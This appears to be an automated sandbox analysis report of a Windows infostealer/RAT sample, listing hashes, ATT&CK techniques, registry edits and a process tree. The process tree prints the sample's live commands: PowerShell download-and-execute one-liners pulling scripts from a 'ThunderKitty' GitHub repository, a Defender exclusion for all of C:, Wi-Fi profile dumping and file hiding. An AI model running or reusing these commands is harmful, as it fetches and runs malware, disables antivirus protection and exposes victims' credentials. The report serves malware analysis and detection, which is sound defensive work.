d55391034b06b7e03eeb2351b1d249a9ce0f001acacb0666e0cd273c65f54512

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
18/08/2024, 05:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe
Size

14.0MB
MD5

ba21fe70f90349c111abf6b43a9b4754
SHA1

a3e53333ac1bee40eb5c8cebbb59e7078238707e
SHA256

d55391034b06b7e03eeb2351b1d249a9ce0f001acacb0666e0cd273c65f54512
SHA512

15317bcb1d3f34d0d3bcc56bf6254fad858b0973a70df06d2b18c56e293f39eaf7bc1f8fde275059f67e6c36f1bb24538078be69b96bdfe07429e85b076027bb
SSDEEP

98304:B4KSqfN+NFwm29yrA7I3TKBaGj1EEqDWRtE7O1OxMZjNT/61Sx2i1HFM+9JHdmLk:xN+NFWDGFCxnm1Sv1HFLrHggImTyk

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation ransomware spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
14	1096	powershell.exe
15	3684	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3684	powershell.exe
1096	powershell.exe
4180	PowerShell.exe
2624	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2748	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
14	raw.githubusercontent.com
15	raw.githubusercontent.com
13	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
4284	ARP.EXE

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Thunder_Kitty.jpg"	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
644	netsh.exe
4308	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
4432	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3848	ipconfig.exe
4432	NETSTAT.EXE
788	ipconfig.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4284	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\Desktop\TileWallpaper = "0"	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\Desktop\WallpaperStyle = "2"	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
2624	powershell.exe
1096	powershell.exe
3684	powershell.exe
3684	powershell.exe
4180	PowerShell.exe
2624	powershell.exe
1096	powershell.exe
4180	PowerShell.exe
3684	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	1096	powershell.exe
Token: SeDebugPrivilege	3684	powershell.exe
Token: SeDebugPrivilege	4180	PowerShell.exe
Token: SeDebugPrivilege	4284	taskkill.exe
Token: 33	3432	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3432	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	3684	powershell.exe
Token: SeSecurityPrivilege	3684	powershell.exe
Token: SeTakeOwnershipPrivilege	3684	powershell.exe
Token: SeLoadDriverPrivilege	3684	powershell.exe
Token: SeSystemProfilePrivilege	3684	powershell.exe
Token: SeSystemtimePrivilege	3684	powershell.exe
Token: SeProfSingleProcessPrivilege	3684	powershell.exe
Token: SeIncBasePriorityPrivilege	3684	powershell.exe
Token: SeCreatePagefilePrivilege	3684	powershell.exe
Token: SeBackupPrivilege	3684	powershell.exe
Token: SeRestorePrivilege	3684	powershell.exe
Token: SeShutdownPrivilege	3684	powershell.exe
Token: SeDebugPrivilege	3684	powershell.exe
Token: SeSystemEnvironmentPrivilege	3684	powershell.exe
Token: SeRemoteShutdownPrivilege	3684	powershell.exe
Token: SeUndockPrivilege	3684	powershell.exe
Token: SeManageVolumePrivilege	3684	powershell.exe
Token: 33	3684	powershell.exe
Token: 34	3684	powershell.exe
Token: 35	3684	powershell.exe
Token: 36	3684	powershell.exe
Token: SeIncreaseQuotaPrivilege	3684	powershell.exe
Token: SeSecurityPrivilege	3684	powershell.exe
Token: SeTakeOwnershipPrivilege	3684	powershell.exe
Token: SeLoadDriverPrivilege	3684	powershell.exe
Token: SeSystemProfilePrivilege	3684	powershell.exe
Token: SeSystemtimePrivilege	3684	powershell.exe
Token: SeProfSingleProcessPrivilege	3684	powershell.exe
Token: SeIncBasePriorityPrivilege	3684	powershell.exe
Token: SeCreatePagefilePrivilege	3684	powershell.exe
Token: SeBackupPrivilege	3684	powershell.exe
Token: SeRestorePrivilege	3684	powershell.exe
Token: SeShutdownPrivilege	3684	powershell.exe
Token: SeDebugPrivilege	3684	powershell.exe
Token: SeSystemEnvironmentPrivilege	3684	powershell.exe
Token: SeRemoteShutdownPrivilege	3684	powershell.exe
Token: SeUndockPrivilege	3684	powershell.exe
Token: SeManageVolumePrivilege	3684	powershell.exe
Token: 33	3684	powershell.exe
Token: 34	3684	powershell.exe
Token: 35	3684	powershell.exe
Token: 36	3684	powershell.exe
Token: SeIncreaseQuotaPrivilege	3684	powershell.exe
Token: SeSecurityPrivilege	3684	powershell.exe
Token: SeTakeOwnershipPrivilege	3684	powershell.exe
Token: SeLoadDriverPrivilege	3684	powershell.exe
Token: SeSystemProfilePrivilege	3684	powershell.exe
Token: SeSystemtimePrivilege	3684	powershell.exe
Token: SeProfSingleProcessPrivilege	3684	powershell.exe
Token: SeIncBasePriorityPrivilege	3684	powershell.exe
Token: SeCreatePagefilePrivilege	3684	powershell.exe
Token: SeBackupPrivilege	3684	powershell.exe
Token: SeRestorePrivilege	3684	powershell.exe
Token: SeShutdownPrivilege	3684	powershell.exe
Token: SeDebugPrivilege	3684	powershell.exe
Token: SeSystemEnvironmentPrivilege	3684	powershell.exe
Token: SeRemoteShutdownPrivilege	3684	powershell.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 748 wrote to memory of 3684	748	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe	85
PID 748 wrote to memory of 3684	748	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe	85
PID 748 wrote to memory of 1096	748	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe	86
PID 748 wrote to memory of 1096	748	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe	86
PID 748 wrote to memory of 2624	748	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe	88
PID 748 wrote to memory of 2624	748	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe	88
PID 748 wrote to memory of 1880	748	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe	89
PID 748 wrote to memory of 1880	748	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe	89
PID 748 wrote to memory of 4180	748	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe	90
PID 748 wrote to memory of 4180	748	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe	90
PID 748 wrote to memory of 4808	748	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe	91
PID 748 wrote to memory of 4808	748	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe	91
PID 4808 wrote to memory of 2860	4808	cmd.exe	92
PID 4808 wrote to memory of 2860	4808	cmd.exe	92
PID 748 wrote to memory of 2792	748	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe	112
PID 748 wrote to memory of 2792	748	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe	112
PID 1096 wrote to memory of 1984	1096	powershell.exe	94
PID 1096 wrote to memory of 1984	1096	powershell.exe	94
PID 3684 wrote to memory of 1948	3684	powershell.exe	95
PID 3684 wrote to memory of 1948	3684	powershell.exe	95
PID 1984 wrote to memory of 388	1984	csc.exe	96
PID 1984 wrote to memory of 388	1984	csc.exe	96
PID 1948 wrote to memory of 1756	1948	csc.exe	97
PID 1948 wrote to memory of 1756	1948	csc.exe	97
PID 748 wrote to memory of 4284	748	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe	122
PID 748 wrote to memory of 4284	748	2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe	122
PID 3684 wrote to memory of 644	3684	powershell.exe	102
PID 3684 wrote to memory of 644	3684	powershell.exe	102
PID 3684 wrote to memory of 2620	3684	powershell.exe	105
PID 3684 wrote to memory of 2620	3684	powershell.exe	105
PID 2620 wrote to memory of 1208	2620	net.exe	106
PID 2620 wrote to memory of 1208	2620	net.exe	106
PID 3684 wrote to memory of 2748	3684	powershell.exe	107
PID 3684 wrote to memory of 2748	3684	powershell.exe	107
PID 3684 wrote to memory of 2504	3684	powershell.exe	109
PID 3684 wrote to memory of 2504	3684	powershell.exe	109
PID 3684 wrote to memory of 1432	3684	powershell.exe	111
PID 3684 wrote to memory of 1432	3684	powershell.exe	111
PID 1432 wrote to memory of 2792	1432	net.exe	112
PID 1432 wrote to memory of 2792	1432	net.exe	112
PID 3684 wrote to memory of 3848	3684	powershell.exe	114
PID 3684 wrote to memory of 3848	3684	powershell.exe	114
PID 3684 wrote to memory of 4736	3684	powershell.exe	115
PID 3684 wrote to memory of 4736	3684	powershell.exe	115
PID 4736 wrote to memory of 1680	4736	net.exe	116
PID 4736 wrote to memory of 1680	4736	net.exe	116
PID 3684 wrote to memory of 4604	3684	powershell.exe	117
PID 3684 wrote to memory of 4604	3684	powershell.exe	117
PID 3684 wrote to memory of 4432	3684	powershell.exe	118
PID 3684 wrote to memory of 4432	3684	powershell.exe	118
PID 3684 wrote to memory of 660	3684	powershell.exe	119
PID 3684 wrote to memory of 660	3684	powershell.exe	119
PID 3684 wrote to memory of 788	3684	powershell.exe	120
PID 3684 wrote to memory of 788	3684	powershell.exe	120
PID 3684 wrote to memory of 516	3684	powershell.exe	121
PID 3684 wrote to memory of 516	3684	powershell.exe	121
PID 3684 wrote to memory of 4284	3684	powershell.exe	122
PID 3684 wrote to memory of 4284	3684	powershell.exe	122
PID 3684 wrote to memory of 4308	3684	powershell.exe	123
PID 3684 wrote to memory of 4308	3684	powershell.exe	123

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2792	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-18_ba21fe70f90349c111abf6b43a9b4754_poet-rat_snatch.exe"
1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3684
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\indxs0nx\indxs0nx.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1948
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES88B8.tmp" "c:\Users\Admin\AppData\Local\Temp\indxs0nx\CSC459A05D4F24E4F02AE99D7A1C8EF249.TMP"
      4⤵
      PID:1756
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:644
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2620
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:1208
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2748
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:2504
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1432
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:2792
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:3848
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4736
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:1680
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:4604
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:4432
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:660
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:788
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:516
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:4284
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1096
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3nwtyy3j\3nwtyy3j.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1984
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES88A8.tmp" "c:\Users\Admin\AppData\Local\Temp\3nwtyy3j\CSC3ACFDC58817B41E18C71652D5E26F32.TMP"
      4⤵
      PID:388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2624
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:1880
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4180
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4808
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:2860
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:2792
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wallpaper32.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4284

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x530 0x528
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

